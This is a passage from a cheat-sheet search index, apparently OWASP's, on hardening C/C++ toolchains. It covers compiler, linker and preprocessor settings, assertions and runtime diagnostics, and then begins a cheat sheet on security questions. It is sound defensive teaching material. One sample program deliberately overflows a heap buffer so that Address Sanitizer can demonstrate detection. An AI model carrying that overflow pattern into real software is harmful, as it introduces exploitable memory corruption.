"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#integration","title":"Integration","text":"

Project level integration presents opportunities to harden your program or library with domain specific knowledge. For example, if the platform supports Position Independent Executables (PIE or ASLR) and data execution prevention (DEP), then you should integrate with them. Not doing so could result in exploitation. As a case in point, see KingCope's 0-days for MySQL in December, 2012 (CVE-2012-5579 and CVE-2012-5612, among others). Integration with platform security would have neutered a number of the 0-days.

You also have the opportunity to include helpful libraries that are not needed for business logic support. For example, if you are working on a platform with DMalloc or Address Sanitizer, you should probably use them in your debug builds. For Ubuntu, DMalloc is available from the package manager and can be installed with sudo apt install libdmalloc5. For Apple platforms, it's available as a scheme option. Address Sanitizer is available in GCC 4.8 and above for many platforms.
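
For illustration only (not from the ESAPI sources), the small program below contains a deliberate heap overflow; building it with -fsanitize=address on GCC 4.8+ or a recent Clang produces a heap-buffer-overflow report at runtime instead of silent corruption:

// asan_demo.cpp - deliberate heap overflow for Address Sanitizer to catch.\n// Build sketch: g++ -g -fsanitize=address asan_demo.cpp -o asan_demo\n#include <cstring>\n\nint main()\n{\n    char* buffer = new char[8];\n    std::strcpy(buffer, \"this string is longer than eight bytes\");  // heap-buffer-overflow\n    delete[] buffer;\n    return 0;\n}\n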

In addition, project level integration is an opportunity to harden third party libraries you chose to include. Because you chose to include them, you and your users are responsible for them. If you or your users endure a SP800-53 audit, third party libraries will be in scope because the supply chain is included (specifically, item SA-12, Supply Chain Protection). The audits are not limited to those in the US Federal arena - financial institutions perform reviews too. A perfect example of violating this guidance is CVE-2012-1525, which was due to Adobe's inclusion of a defective Sablotron library.

Another example is including OpenSSL. You know (1) SSLv2 is insecure, (2) SSLv3 is insecure, and (3) compression is insecure (among others). In addition, suppose you don't use hardware and engines, and only allow static linking. Given the knowledge and specifications, you would configure the OpenSSL library as follows:

$ Configure darwin64-x86_64-cc -no-hw -no-engine -no-comp -no-shared\n    -no-dso -no-ssl2 -no-ssl3 --openssldir=\u2026\n

Note Well: you might want engines, especially on Ivy Bridge microarchitectures (3rd generation Intel Core i5 and i7 processors). To have OpenSSL use the processor's random number generator (via the rdrand instruction), you will need to call OpenSSL's ENGINE_load_rdrand() function and then ENGINE_set_default with ENGINE_METHOD_RAND. See OpenSSL's Random Numbers for details.
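
As a rough sketch (error handling omitted, and assuming OpenSSL 1.0.1 or later built with engine support), the calls look like the following:

// Prefer the CPU's rdrand engine for OpenSSL's default RAND method.\n// Sketch only - check and log the return values in real code.\n#include <openssl/engine.h>\n\nvoid use_rdrand_engine()\n{\n    ENGINE_load_rdrand();\n    ENGINE* eng = ENGINE_by_id(\"rdrand\");\n    if (eng != NULL && ENGINE_init(eng) != 0) {\n        ENGINE_set_default(eng, ENGINE_METHOD_RAND);\n    }\n}\n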

If you configure without the switches, then you will likely have vulnerable code/libraries and risk failing an audit. If the program is a remote server, then the following command will reveal if compression is active on the channel:

echo \"GET / HTTP1.0\" | openssl s_client -connect <nowiki>example.com:443</nowiki>\n

nm or openssl s_client will show that compression is enabled in the client. In fact, any symbol within the OPENSSL_NO_COMP preprocessor macro will bear witness since -no-comp is translated into a CFLAGS define.

$ nm /usr/local/ssl/iphoneos/lib/libcrypto.a 2>/dev/null | egrep -i \"(COMP_CTX_new|COMP_CTX_free)\"\n0000000000000110 T COMP_CTX_free\n0000000000000000 T COMP_CTX_new\n

Even more egregious is the answer given to auditors who specifically ask about configurations and protocols: \"we don't use weak/wounded/broken ciphers\" or \"we follow best practices.\" The use of compression tells the auditor that you are using a wounded protocol in an insecure configuration and that you don't follow best practices. That will likely set off alarm bells, and ensure the auditor dives deeper on more items.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#preprocessor","title":"Preprocessor","text":"

The preprocessor is crucial to setting up a project for success. The C committee provided one macro - NDEBUG - and the macro can be used to derive a number of configurations and drive engineering processes. Unfortunately, the committee also left many related items to chance, which has resulted in programmers abusing built-in facilities. This section will help you set up your projects to integrate well with other projects and ensure reliability and security.

There are three topics to discuss when hardening the preprocessor. The first is well defined configurations which produce well defined behaviors, the second is useful behavior from assert, and the third is proper use of macros when integrating vendor code and third party libraries.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#configurations","title":"Configurations","text":"

To remove ambiguity, you should recognize two configurations: Release and Debug. Release is for production code on live servers, and its behavior is requested via the C/C++ NDEBUG macro. It's also the only macro observed by the C and C++ Committees and Posix. Diametrically opposed to Release is Debug. While there is a compelling argument for !defined(NDEBUG), you should have an explicit macro for the configuration and that macro should be DEBUG. This is because vendors and outside libraries use a DEBUG (or similar) macro for their configuration. For example, Carnegie Mellon's Mach kernel uses DEBUG, Microsoft's CRT uses _DEBUG, and Wind River Workbench uses DEBUG_MODE.

In addition to NDEBUG (Release) and DEBUG (Debug), you have two additional cross products: both are defined or neither are defined. Defining both should be an error, and defining neither should default to a release configuration. Below is from ESAPI C++ EsapiCommon.h, which is the configuration file used by all source files:

// Only one or the other, but not both\n##if (defined(DEBUG) || defined(_DEBUG)) && (defined(NDEBUG)\n|| defined(_NDEBUG))\n## error Both DEBUG and NDEBUG are defined.\n##endif\n\n// The only time we switch to debug is when asked.\n// NDEBUG or {nothing} results\n// in release build (fewer surprises at runtime).\n##if defined(DEBUG) || defined(_DEBUG)\n## define ESAPI_BUILD_DEBUG 1\n##else\n## define ESAPI_BUILD_RELEASE 1\n##endif\n

When DEBUG is in effect, your code should receive full debug instrumentation, including the full force of assertions.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#assert","title":"ASSERT","text":"

Asserts will help you create self-debugging code by helping you find the point of first failure quickly and easily. Asserts should be used throughout your program, including parameter validation, return value checking and program state. The assert will silently guard your code through its lifetime. It will always be there, even when not debugging a specific component of a module. If you have thorough code coverage, you will spend less time debugging and more time developing because programs will debug themselves.

To use asserts effectively, you should assert everything. That includes parameters upon entering a function, return values from function calls, and any program state. Everywhere you place an if statement for validation or checking, you should have an assert. Everywhere you have an assert for validation or checking, you should have an if statement. They go hand-in-hand.
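
A minimal sketch of the pattern (the function is hypothetical, not from ESAPI): the assert snaps the debugger during development, while the if statement still protects release builds where asserts compile away.

#include <cassert>\n#include <stdexcept>\n#include <string>\n\n// Hypothetical example: validate the parameter twice - once for the\n// developer (assert) and once for the program (if/throw).\nstd::string GetDisplayName(const char* name)\n{\n    assert(name != NULL);\n    if (name == NULL)\n        throw std::invalid_argument(\"name is NULL\");\n\n    std::string result(name);\n    assert(!result.empty());\n    if (result.empty())\n        throw std::invalid_argument(\"name is empty\");\n\n    return result;\n}\n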

If you are still using printf statements, then you have an opportunity for improvement. In the time it takes you to write a printf or NSLog statement, you could have written an assert. Unlike the printf or NSLog, which are often removed when no longer needed, the assert stays active forever. Remember, this is all about finding the point of first failure quickly so you can spend your time doing other things.

There is one problem with using asserts - Posix states assert should call abort() if NDEBUG is not defined. When debugging, NDEBUG will never be defined since you want the \"program diagnostics\" (quote from the Posix description). The behavior makes assert and its accompanying abort() completely useless for development. The result of \"program diagnostics\" calling abort() due to standard C/C++ behavior is disuse - developers simply don't use them. It's incredibly bad for the development community because self-debugging programs can help eradicate so many stability problems.

Since self-debugging programs are so powerful, you will have to supply your own assert and signal handler with improved behavior. Your assert will exchange auto-aborting behavior for auto-debugging behavior. The auto-debugging facility will ensure the debugger snaps when a problem is detected, so you will find the point of first failure quickly and easily.

ESAPI C++ supplies its own assert with the behavior described above. In the code below, ASSERT raises SIGTRAP when in effect or it evaluates to void in other cases.

// A debug assert which should be sprinkled liberally.\n// This assert fires and then continues rather\n// than calling abort(). Useful when examining negative\n// test cases from the command-line.\n##if (defined(ESAPI_BUILD_DEBUG) && defined(ESAPI_OS_STARNIX))\n##  define ESAPI_ASSERT1(exp) {                                    \\\n    if(!(exp)) {                                                  \\\n        std::ostringstream oss;                                     \\\n        oss << \"Assertion failed: \" << (char*)(__FILE__) << \"(\"     \\\n            << (int)__LINE__ << \"): \" << (char*)(__func__)          \\\n            << std::endl;                                           \\\n        std::cerr << oss.str();                                     \\\n        raise(SIGTRAP);                                             \\\n    }                                                             \\\n    }\n##  define ESAPI_ASSERT2(exp, msg) {                               \\\n    if(!(exp)) {                                                  \\\n        std::ostringstream oss;                                     \\\n        oss << \"Assertion failed: \" << (char*)(__FILE__) << \"(\"     \\\n            << (int)__LINE__ << \"): \" << (char*)(__func__)          \\\n            << \": \\\"\" << (msg) << \"\\\"\" << std::endl;                \\\n        std::cerr << oss.str();                                     \\\n        raise(SIGTRAP);                                             \\\n    }                                                             \\\n    }\n##elif (defined(ESAPI_BUILD_DEBUG) && defined(ESAPI_OS_WINDOWS))\n##  define ESAPI_ASSERT1(exp)      assert(exp)\n##  define ESAPI_ASSERT2(exp, msg) assert(exp)\n##else\n##  define ESAPI_ASSERT1(exp)      ((void)(exp))\n##  define ESAPI_ASSERT2(exp, msg) ((void)(exp))\n##endif\n\n##if !defined(ASSERT)\n##  define ASSERT(exp)     ESAPI_ASSERT1(exp)\n##endif\n

At program startup, a SIGTRAP handler will be installed if one is not provided by another component:

    struct DebugTrapHandler\n{\nDebugTrapHandler()\n{\nstruct sigaction new_handler, old_handler;\n\ndo\n{\nint ret = 0;\n\nret = sigaction (SIGTRAP, NULL, &old_handler);\nif (ret != 0) break; // Failed\n\n// Don't step on another's handler\nif (old_handler.sa_handler != NULL) break;\n\nnew_handler.sa_handler = &DebugTrapHandler::NullHandler;\nnew_handler.sa_flags = 0;\n\nret = sigemptyset (&new_handler.sa_mask);\nif (ret != 0) break; // Failed\n\nret = sigaction (SIGTRAP, &new_handler, NULL);\nif (ret != 0) break; // Failed\n\n} while(0);\n}\n\nstatic void NullHandler(int /*unused*/) { }\n\n};\n\n// We specify a relatively low priority, to make sure we run before other CTORs\n// http://gcc.gnu.org/onlinedocs/gcc/C_002b_002b-Attributes.html#C_002b_002b-Attributes\nstatic const DebugTrapHandler g_dummyHandler __attribute__ ((init_priority (110)));\n

On a Windows platform, you would call _set_invalid_parameter_handler (and possibly set_unexpected or set_terminate) to install a new handler.
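
A minimal sketch for Visual C++ follows (the CRT function and handler signature are the documented MSVC APIs; the handler body and program structure are illustrative):

// Route CRT \"invalid parameter\" reports to the debugger instead of the\n// default CRT behavior. MSVC only; adapt the handler body to your project.\n#include <cstdlib>\n#include <cstdint>\n#include <intrin.h>\n\nvoid __cdecl InvalidParameterHandler(const wchar_t* /*expression*/,\n                                     const wchar_t* /*function*/,\n                                     const wchar_t* /*file*/,\n                                     unsigned int   /*line*/,\n                                     uintptr_t      /*reserved*/)\n{\n    __debugbreak();   // snap the debugger at the point of first failure\n}\n\nint main()\n{\n    _set_invalid_parameter_handler(InvalidParameterHandler);\n    // ... rest of the program\n    return 0;\n}\n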

Live hosts running production code should always define NDEBUG (i.e., release configuration), which means they do not assert or auto-abort. Auto-abortion is not acceptable behavior, and anyone who asks for the behavior is completely abusing the functionality of \"program diagnostics\". If a program wants a core dump, then it should create the dump rather than crashing.

For more reading on asserting effectively, please see one of John Robbins' books, such as Debugging Applications. John is a legendary bug slayer in Windows circles, and he will show you how to do nearly everything, from debugging a simple program to bug slaying in multithreaded programs.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#additional-macros","title":"Additional Macros","text":"

Additional macros include any macros needed to integrate properly and securely. It includes integrating the program with the platform (for example MFC or Cocoa/CocoaTouch) and libraries (for example, Crypto++ or OpenSSL). It can be a challenge because you have to have proficiency with your platform and all included libraries and frameworks. The list below illustrates the level of detail you will need when integrating.

Though Boost is missing from the list, it appears to lack recommendations, additional debug diagnostics, and a hardening guide. See BOOST Hardening Guide (Preprocessor Macros) for details. In addition, Tim Day points to [boost.build] should we not define _SECURE_SCL=0 by default for all msvc toolsets for a recent discussion related to hardening (or lack thereof).

In addition to what you should define, defining some macros and undefining others should trigger a security-related defect. For example, -U_FORTIFY_SOURCE on Linux and _CRT_SECURE_NO_WARNINGS=1, _SCL_SECURE_NO_WARNINGS, _ATL_SECURE_NO_WARNINGS or STRSAFE_NO_DEPRECATE on Windows.

a) Be careful with _GLIBCXX_DEBUG when using pre-compiled libraries such as Boost from a distribution. There are ABI incompatibilities, and the result will likely be a crash. You will have to compile Boost with _GLIBCXX_DEBUG or omit _GLIBCXX_DEBUG.

b) See Chapter 5, Diagnostics of the libstdc++ manual for details.

c) SQLite secure deletion zeroizes memory on destruction. Define it as required, and always define it in US Federal environments since zeroization is required for FIPS 140-2, Level 1.

d) N is 0644 by default, which means everyone has some access.

e) Force temporary tables into memory (no unencrypted data to disk).

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#compiler-and-linker","title":"Compiler and Linker","text":"

Compiler writers provide a rich set of warnings from the analysis of code during compilation. Both GCC and Visual Studio have static analysis capabilities to help find mistakes early in the development process. The built-in static analysis capabilities of GCC and Visual Studio are usually sufficient to ensure proper API usage and catch a number of mistakes such as using an uninitialized variable or comparing a negative signed int and a positive unsigned int.

As a concrete example, (and for those not familiar with C/C++ promotion rules), a warning will be issued if a signed integer is promoted to an unsigned integer and then compared because a side effect is -1 > 1 after promotion! GCC and Visual Studio will not currently catch, for example, SQL injections and other tainted data usage. For that, you will need a tool designed to perform data flow analysis or taint analysis.
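
A tiny illustration of the promotion trap (compile with -Wall -Wextra or -Wsign-compare to see the warning):

#include <iostream>\n\nint main()\n{\n    int s = -1;\n    unsigned int u = 1;\n\n    // s is converted to unsigned for the comparison, so it becomes a huge\n    // positive value and the \"obviously false\" test is actually true.\n    if (s > u)\n        std::cout << \"-1 > 1 after promotion\" << std::endl;\n\n    return 0;\n}\n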

Some in the development community resist static analysis or refute its results. For example, when static analysis warned the Linux kernel's sys_prctl was comparing an unsigned value against less than zero, Jesper Juhl offered a patch to clean up the code. Linus Torvalds howled \"No, you don't do this\u2026 GCC is crap\" (referring to compiling with warnings). For the full discussion, see [PATCH] Don't compare unsigned variable for <0 in sys_prctl() from the Linux Kernel mailing list.

The following sections will detail steps for three platforms. First is a typical GNU Linux based distribution offering GCC and Binutils, second is Clang and Xcode, and third is modern Windows platforms.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#distribution-hardening","title":"Distribution Hardening","text":"

Before discussing GCC and Binutils, it would be a good time to point out that some of the defenses discussed below are already present in a distribution. Unfortunately, it's design by committee, so what is present is usually only a mild variation of what is available (this way, everyone is mildly offended). For those who are purely worried about performance, you might be surprised to learn you have already taken the small performance hit without even knowing.

Linux and BSD distributions often apply some hardening without intervention via GCC Spec Files. If you are using Debian, Ubuntu, Linux Mint and family, see Debian Hardening. For Red Hat and Fedora systems, see New hardened build support (coming) in F16. Gentoo users should visit Hardened Gentoo.

You can see the settings being used by a distribution via gcc -dumpspecs. From Linux Mint 12 below, -fstack-protector (but not -fstack-protector-all) is used by default.

$ gcc -dumpspecs\n\u2026\n*link_ssp: %{fstack-protector:}\n\n*ssp_default: %{!fno-stack-protector:%{!fstack-protector-all:\n              %{!ffreestanding:%{!nostdlib:-fstack-protector}}}}\n\u2026\n

The \"SSP\" above stands for Stack Smashing Protector. SSP is a reimplementation of Hiroaki Etoh's work on IBM Pro Police Stack Detector. See Hiroaki Etoh's patch gcc stack-smashing protector and IBM's GCC extension for protecting applications from stack-smashing attacks for details.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#gccbinutils","title":"GCC/Binutils","text":"

GCC (the compiler collection) and Binutils (the assemblers, linkers, and other tools) are separate projects that work together to produce a final executable. Both the compiler and linker offer options to help you write safer and more secure code. The linker will produce code which takes advantage of platform security features offered by the kernel and PaX, such as no-exec stacks and heaps (NX) and Position Independent Executable (PIE).

The table below offers a set of compiler options to build your program. Static analysis warnings help catch mistakes early, while the linker options harden the executable at runtime. In the table below, \"GCC\" should be loosely taken as \"non-ancient distributions.\" While the GCC team considers 4.2 ancient, you will still encounter it on Apple and BSD platforms due to changes in GPL licensing around 2007. Refer to GCC Option Summary, Options to Request or Suppress Warnings and Binutils (LD) Command Line Options for usage details.

Worthy of special mention are -fno-strict-overflow and -fwrapv. The flags ensure the compiler does not remove statements that result in overflow or wrap. If your program only runs correctly when using these flags, it is likely violating C/C++ rules on overflow and is illegal. If the program is illegal due to overflow or wrap, you should consider using safe-iop for C or David LeBlanc's SafeInt in C++.
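
As a small illustration of what the flags preserve, the check below relies on signed wrap-around; an optimizing compiler may assume the overflow cannot happen and remove the test entirely unless -fno-strict-overflow or -fwrapv is in effect:

#include <climits>\n#include <iostream>\n\nbool next_would_overflow(int x)\n{\n    // Relies on signed wrap-around, which is undefined behavior; the\n    // optimizer may delete this check unless -fwrapv or -fno-strict-overflow\n    // is used.\n    return x + 1 < x;\n}\n\nint main()\n{\n    std::cout << next_would_overflow(INT_MAX) << std::endl;\n    return 0;\n}\n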

For a project compiled and linked with hardened settings, some of those settings can be verified with the Checksec tool written by Tobias Klein. The checksec.sh script is designed to test standard Linux OS and PaX security features being used by an application. See the Trapkit web page for details.

GCC C Warning Options table:

a) Unlike Clang and -Weverything, GCC does not provide a switch to truly enable all warnings.

b) -fstack-protector guards functions with high risk objects such as C strings, while -fstack-protector-all guards all objects.

Additional C++ warnings which can be used include the following in Table 3. See GCC's Options Controlling C++ Dialect for additional options and details.

GCC C++ Warning Options table:

Effective C++, Second Edition book.

And additional Objective C warnings which are often useful include the following. See Options Controlling Objective-C and Objective-C++ Dialects for additional options and details.

GCC Objective C Warning Options table:

The use of aggressive warnings will produce spurious noise. The noise is a tradeoff - you can learn of potential problems at the cost of wading through some chaff. The following will help reduce spurious noise from the warning system:

Finally, a simple version-based Makefile example is shown below. This is different from the feature-based makefiles produced by Autotools (which test for a particular feature and then define a symbol or configure a template file). Not all platforms use all options and flags. To address the issue you can pursue one of two strategies: you can ship with a weakened posture by servicing the lowest common denominator, or you can ship with everything in force. In the latter case, those who don't have a feature available will edit the makefile to accommodate their installation.

CXX=g++\nEGREP = egrep\n\u2026\n\nGCC_COMPILER = $(shell $(CXX) -v 2>&1 | $(EGREP) -i -c '^gcc version')\nGCC41_OR_LATER = $(shell $(CXX) -v 2>&1 | $(EGREP) -i -c '^gcc version (4\\.[1-9]|[5-9])')\n\u2026\n\nGNU_LD210_OR_LATER = $(shell $(LD) -v 2>&1 | $(EGREP) -i -c '^gnu ld .* (2\\.1[0-9]|2\\.[2-9])')\nGNU_LD214_OR_LATER = $(shell $(LD) -v 2>&1 | $(EGREP) -i -c '^gnu ld .* (2\\.1[4-9]|2\\.[2-9])')\n\u2026\n\nifeq ($(GCC_COMPILER),1)\nMY_CC_FLAGS += -Wall -Wextra -Wconversion\n    MY_CC_FLAGS += -Wformat=2 -Wformat-security\n    MY_CC_FLAGS += -Wno-unused-parameter\nendif\n\nifeq ($(GCC41_OR_LATER),1)\nMY_CC_FLAGS += -fstack-protector-all\nendif\n\nifeq ($(GCC42_OR_LATER),1)\nMY_CC_FLAGS += -Wstrict-overflow\nendif\n\nifeq ($(GCC43_OR_LATER),1)\nMY_CC_FLAGS += -Wtrampolines\nendif\n\nifeq ($(GNU_LD210_OR_LATER),1)\nMY_LD_FLAGS += -z,nodlopen -z,nodump\nendif\n\nifeq ($(GNU_LD214_OR_LATER),1)\nMY_LD_FLAGS += -z,noexecstack -z,noexecheap\nendif\n\nifeq ($(GNU_LD215_OR_LATER),1)\nMY_LD_FLAGS += -z,relro -z,now\nendif\n\nifeq ($(GNU_LD216_OR_LATER),1)\nMY_CC_FLAGS += -fPIE\n    MY_LD_FLAGS += -pie\nendif\n\n## Use 'override' to honor the user's command line\noverride CFLAGS := $(MY_CC_FLAGS) $(CFLAGS)\noverride CXXFLAGS := $(MY_CC_FLAGS) $(CXXFLAGS)\noverride LDFLAGS := $(MY_LD_FLAGS) $(LDFLAGS)\n\u2026\n
"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#clangxcode","title":"Clang/Xcode","text":"

Clang and LLVM have been aggressively developed since Apple lost its GPL compiler back in 2007 (due to Tivoization, which resulted in GPLv3). Since that time, a number of developers and Google have joined the effort. While Clang will consume most (all?) GCC/Binutils flags and switches, the project supports a number of its own options, including a static analyzer. In addition, Clang is relatively easy to build with additional diagnostics, such as Dr. John Regehr and Peng Li's Integer Overflow Checker (IOC).

IOC is incredibly useful, and has found bugs in a number of projects, including the Linux Kernel (include/linux/bitops.h, still unfixed), SQLite, PHP, Firefox (many still unfixed), LLVM, and Python. Future versions of Clang (Clang 3.3 and above) will allow you to enable the checks out of the box with -fsanitize=integer and -fsanitize=shift.
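
For a hedged example of the kind of defect these checks flag, the program below (built with something like clang++ -fsanitize=integer -fsanitize=shift demo.cpp) triggers both a signed overflow and an over-wide shift at runtime:

#include <climits>\n#include <iostream>\n\nint main(int argc, char**)\n{\n    int counter = INT_MAX;\n    counter += argc;              // signed overflow: reported by -fsanitize=integer\n\n    unsigned amount = 31u + static_cast<unsigned>(argc);\n    unsigned bit = 1u << amount;  // shift amount >= width: reported by -fsanitize=shift\n\n    std::cout << counter << \" \" << bit << std::endl;\n    return 0;\n}\n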

Clang options can be found at the Clang Compiler User's Manual. Clang does include an option to turn on all warnings - -Weverything. Use it with care, since it will produce a lot of noise, but use it regularly since it will also surface issues you missed. For example, add -Weverything for production builds and make non-spurious issues a quality gate. Under Xcode, simply add -Weverything to CFLAGS and CXXFLAGS.

In addition to compiler warnings, both static analysis and additional security checks can be performed. Reading on Clang's static analysis capabilities can be found at Clang Static Analyzer. Figure 1 below shows some of the security checks utilized by Xcode.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#visual-studio","title":"Visual Studio","text":"

Visual Studio offers a convenient Integrated Development Environment (IDE) for managing solutions and their settings. The section called \"Visual Studio Options\" discusses options which should be used with Visual Studio, and the section called \"Project Properties\" demonstrates incorporating those options into a solution's project.

The table below lists the compiler and linker switches which should be used under Visual Studio. Refer to Howard and LeBlanc's Writing Secure Code (Microsoft Press) for a detailed discussion; or Protecting Your Code with Visual C++ Defenses in Security Briefs by Michael Howard. In the table below, \"Visual Studio\" refers to nearly all versions of the development environment, including Visual Studio 5.0 and 6.0.

For a project compiled and linked with hardened settings, those settings can be verified with BinScope. BinScope is a verification tool from Microsoft that analyzes binaries to ensure that they have been built in compliance with Microsoft's Security Development Lifecycle (SDLC) requirements and recommendations. See the BinScope Binary Analyzer download page for details.

a) See Jon Sturgeon's discussion of the switch at Off By Default Compiler Warnings in Visual C++.

a) When using /GS, there are a number of circumstances which affect the inclusion of a security cookie. For example, the guard is not used if there is no buffer in the stack frame, optimizations are disabled, or the function is declared naked or contains inline assembly.

b) #pragma strict_gs_check(on) should be used sparingly, but is recommended in high risk situations, such as when a source file parses input from the internet.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#warn-suppression","title":"Warn Suppression","text":"

From the tables above, a lot of warnings have been enabled to help detect possible programming mistakes. The potential mistakes are detected via the compiler, which carries around a lot of contextual information during its code analysis phase. At times, you will receive spurious warnings because the compiler is not that smart. It's understandable and even a good thing (how would you like to be out of a job because a program writes its own programs?). At times you will have to learn how to work with the compiler's warning system to suppress warnings. Notice what was not said: turn off the warnings.

Suppressing warnings placates the compiler for spurious noise so you can get to the issues that matter (you are separating the wheat from the chaff). This section will offer some hints and point out some potential minefields. First is an unused parameter (for example, argc or argv). Suppressing unused parameter warnings is especially helpful for C++ and interface programming, where parameters are often unused. For this warning, simply define an \"UNUSED\" macro and wrap the parameter:

##define UNUSED_PARAMETER(x) ((void)x)\n\u2026\n\nint main(int argc, char* argv[])\n{\nUNUSED_PARAMETER(argc);\nUNUSED_PARAMETER(argv);\n\u2026\n}\n

A potential minefield lies near \"comparing unsigned and signed\" values, and -Wconversion will catch it for you. This is because C/C++ promotion rules state the signed value will be promoted to an unsigned value and then compared. That means -1 > 1 after promotion! To fix this, you cannot blindly cast - you must first range test the value:

int x = GetX();\nunsigned int y = GetY();\n\nASSERT(x >= 0);\nif(!(x >= 0))\nthrow runtime_error(\"WTF??? X is negative.\");\n\nif(static_cast<unsigned int>(x) > y)\ncout << \"x is greater than y\" << endl;\nelse\ncout << \"x is not greater than y\" << endl;\n

Notice the code above will debug itself - you don't need to set a breakpoint to see if there is a problem with x. Just run the program and wait for it to tell you there is a problem. If there is a problem, the program will snap the debugger (and more importantly, not call a useless abort() as specified by Posix). It beats the snot out of printf statements that are removed when no longer needed or that pollute outputs.

Another conversion problem you will encounter is conversion between types, and -Wconversion will also catch it for you. The following will always have an opportunity to fail, and should light up like a Christmas tree:

struct sockaddr_in addr;\n\u2026\n\naddr.sin_port = htons(atoi(argv[2]));\n

The following would probably serve you much better. Notice atoi and friends are not used because they can silently fail. In addition, the code is instrumented so you don't need to waste a lot of time debugging potential problems:

const char* cstr = GetPortString();\n\nASSERT(cstr != NULL);\nif(!(cstr != NULL))\nthrow runtime_error(\"WTF??? Port string is not valid.\");\n\nistringstream iss(cstr);\nlong long t = 0;\niss >> t;\n\nASSERT(!(iss.fail()));\nif(iss.fail())\nthrow runtime_error(\"WTF??? Failed to read port.\");\n\n// Should this be a port above the reserved range ([0-1024] on Unix)?\nASSERT(t > 0);\nif(!(t > 0))\nthrow runtime_error(\"WTF??? Port is too small\");\n\nASSERT(t < static_cast<long long>(numeric_limits<unsigned int>::max()));\nif(!(t < static_cast<long long>(numeric_limits<unsigned int>::max())))\nthrow runtime_error(\"WTF??? Port is too large\");\n\n// OK to use port\nunsigned short port = static_cast<unsigned short>(t);\n\u2026\n

Again, notice the code above will debug itself - you don't need to set a breakpoint to see if there is a problem with port. This code will continue checking conditions, years after being instrumented (assuming you wrote the code to read a config file early in the project). There's no need to remove the ASSERTs as with printf since they are silent guardians.

Another useful suppression trick is to avoid ignoring return values. Not only is it useful to suppress the warning, it's required for correct code. For example, snprintf will alert you to truncations through its return value. You should not make them silent truncations by ignoring the warning or casting to void:

char path[PATH_MAX];\n\u2026\n\nint ret = snprintf(path, sizeof(path), \"%s/%s\", GetDirectory(), GetObjectName());\nASSERT(ret != -1);\nASSERT(!(ret >= sizeof(path)));\n\nif(ret == -1 || ret >= sizeof(path))\nthrow runtime_error(\"WTF??? Unable to build full object name\");\n\n// OK to use path\n\u2026\n

The problem is pandemic, and not limited to boring user-land programs. Projects which offer high integrity code, such as SELinux, suffer silent truncations. The following is from an approved SELinux patch, even though a comment was made that it suffered silent truncations in its security_compute_create_name function from compute_create.c.

int security_compute_create_raw(security_context_t scon,\n                                security_context_t tcon,\n                                security_class_t   tclass,\n                                security_context_t * newcon)\n{\n  char path[PATH_MAX];\n  char *buf;\n  size_t size;\n  int fd, ret;\n\n  if (!selinux_mnt) {\n    errno = ENOENT;\n    return -1;\n  }\n\n  snprintf(path, sizeof path, \"%s/create\", selinux_mnt);\n  fd = open(path, O_RDWR);\n

Unlike other examples, the above code will not debug itself, and you will have to set breakpoints and trace calls to determine the point of first failure. (And the code above gambles that the truncated file does not exist or is not under an adversary's control by blindly performing the open).

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#runtime","title":"Runtime","text":"

The previous sections concentrated on setting up your project for success. This section will examine additional hints for running with increased diagnostics and defenses. Not all platforms are created equal - on GNU Linux it is difficult to impossible to add hardening to a program after compiling and static linking, while Windows allows post-build hardening through a download. Remember, the goal is to find the point of first failure quickly so you can improve the reliability and security of the code.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#xcode","title":"Xcode","text":"

Xcode offers additional Code Diagnostics that can help find memory errors and object use problems. Schemes can be managed through the Product menu, the Scheme submenu, and then Edit Scheme. From the editor, navigate to the Diagnostics tab. In the figure below, four additional instruments are enabled for the debugging cycle: Scribble guards, Edge guards, Malloc guards, and Zombies.

There is one caveat with using some of the guards: Apple only provides them for the simulator, and not a device. In the past, the guards were available for both devices and simulators.

"},{"location":"cheatsheets/C-Based_Toolchain_Hardening_Cheat_Sheet.html#windows","title":"Windows","text":"

Visual Studio offers a number of debugging aides for use during development. The aides are called Managed Debugging Assistants (MDAs). You can find the MDAs on the Debug menu, then the Exceptions submenu. MDAs allow you to tune your debugging experience by, for example, filtering the exceptions for which the debugger should snap. For more details, see Stephen Toub's Let The CLR Find Bugs For You With Managed Debugging Assistants.

Finally, for runtime hardening, Microsoft has a helpful tool called EMET. EMET is the Enhanced Mitigation Experience Toolkit, and it allows you to apply runtime hardening to an executable which was built without it. It's very useful for utilities and other programs that were built without an SDLC.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html","title":"Choosing and Using Security Questions Cheat Sheet","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#introduction","title":"Introduction","text":"

WARNING: Security questions are no longer recognized as an acceptable authentication factor per NIST SP 800-63. Account recovery is just an alternate way to authenticate so it should be no weaker than regular authentication. See SP 800-63B sec 5.1.1.2 paragraph 4: Verifiers SHALL NOT prompt subscribers to use specific types of information (e.g., \u201cWhat was the name of your first pet?\u201d) when choosing memorized secrets.

If you are curious, please have a look at this study by Microsoft Research in 2009 and this study performed at Google in 2015. The accompanying Security blog update includes an infographic on the issues identified with security questions.

Please Note: While there are no acceptable uses of security questions in secure software, this cheat sheet provides guidance on how to choose strong security questions for legacy purposes.

"},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#choosing-security-questions","title":"Choosing Security Questions","text":""},{"location":"cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html#desired-characteristics","title":"Desired Characteristics","text":"

Any security questions presented to users to reset forgotten passwords must meet the following characteristics:

Characteristic | Explanation
Memorable | The user must be able to recall the answer to the question, potentially years after creating their account.
Consistent | The answer to the question must not change over time.
Applicable | The user must be able to answer the question.
